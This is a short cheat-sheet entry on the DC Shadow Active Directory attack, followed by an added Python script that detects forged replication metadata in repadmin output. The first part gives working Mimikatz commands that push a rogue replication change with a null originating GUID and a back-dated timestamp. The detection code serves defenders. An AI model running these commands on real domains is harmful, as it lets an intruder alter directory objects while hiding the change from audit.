DC Shadow
# DC Shadow is a post-compromise attack that lets you update replication metadata
# On a compromised client, using a domain admin account
# You can attack with Mimikatz
# Terminal 1 (runas)
mimikatz # !+
mimikatz # !processtoken
mimikatz # lsadump::dcshadow /object:dtargaryen /attribute:description /value:"The Game" /replOriginatingUid:{00000000-0000-0000-0000-000000000000} /replOriginatingTime:"2017-01-01 09:00:00" /replOriginatingUsn:42
# Terminal 2 (runas)
mimikatz # lsadump::dcshadow /push
# You can check the result through repadmin on the DC
repadmin /showobjmeta DC01.NORZH.LAN "CN=Daenerys Targaryen,CN=Users,DC=NORZH,DC=LAN"
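# Added example (not part of the original page): a defender-side check that parses saved repadmin /showobjmeta output and flags attribute rows whose replication metadata looks forged, such as the null originating GUID and back-dated timestamp set above.
# Assumptions: the column layout matched by ROW, the constructed SAMPLE rows, and both heuristics (a decommissioned DC can also leave an unresolved GUID, so treat hits as leads to investigate).

```python
import re
from datetime import datetime

# Assumed layout of `repadmin /showobjmeta` attribute rows:
# Loc.USN  Originating DSA  Org.USN  Org.Time/Date  Ver  Attribute
ROW = re.compile(
    r"^\s*(\d+)\s+(\S.*?)\s+(\d+)\s+"
    r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+(\d+)\s+(\S+)\s*$"
)
GUID = re.compile(r"^\{?[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}?$")

# Constructed sample output (not captured from a real DC).
SAMPLE = r"""
Loc.USN          Originating DSA               Org.USN  Org.Time/Date        Ver Attribute
=======          ===============               =======  =============        === =========
  20481    Default-First-Site-Name\DC01          20481  2019-03-12 10:15:02    1 objectClass
  20481    Default-First-Site-Name\DC01          20481  2019-03-12 10:15:02    1 cn
  98770    00000000-0000-0000-0000-000000000000     42  2017-01-01 09:00:00    2 description
  20490    Default-First-Site-Name\DC01          20490  2019-03-12 10:15:03    3 userAccountControl
"""

def parse_rows(text):
    """Parse attribute rows; header and separator lines do not match ROW."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append({"dsa": m.group(2), "org_usn": int(m.group(3)),
                         "time": datetime.strptime(m.group(4), "%Y-%m-%d %H:%M:%S"),
                         "ver": int(m.group(5)), "attr": m.group(6)})
    return rows

def suspicious(rows):
    """Return {attribute: [reasons]} for rows whose metadata looks forged."""
    # objectClass is written at creation, so its time approximates object creation.
    created = next((r["time"] for r in rows if r["attr"] == "objectClass"), None)
    findings = {}
    for r in rows:
        reasons = []
        if GUID.match(r["dsa"]):
            reasons.append("originating DSA is an unresolved GUID")
        if created and r["time"] < created:
            reasons.append("originating time predates object creation")
        if reasons:
            findings[r["attr"]] = reasons
    return findings

if __name__ == "__main__":
    for attr, reasons in suspicious(parse_rows(SAMPLE)).items():
        print(attr, "->", "; ".join(reasons))
```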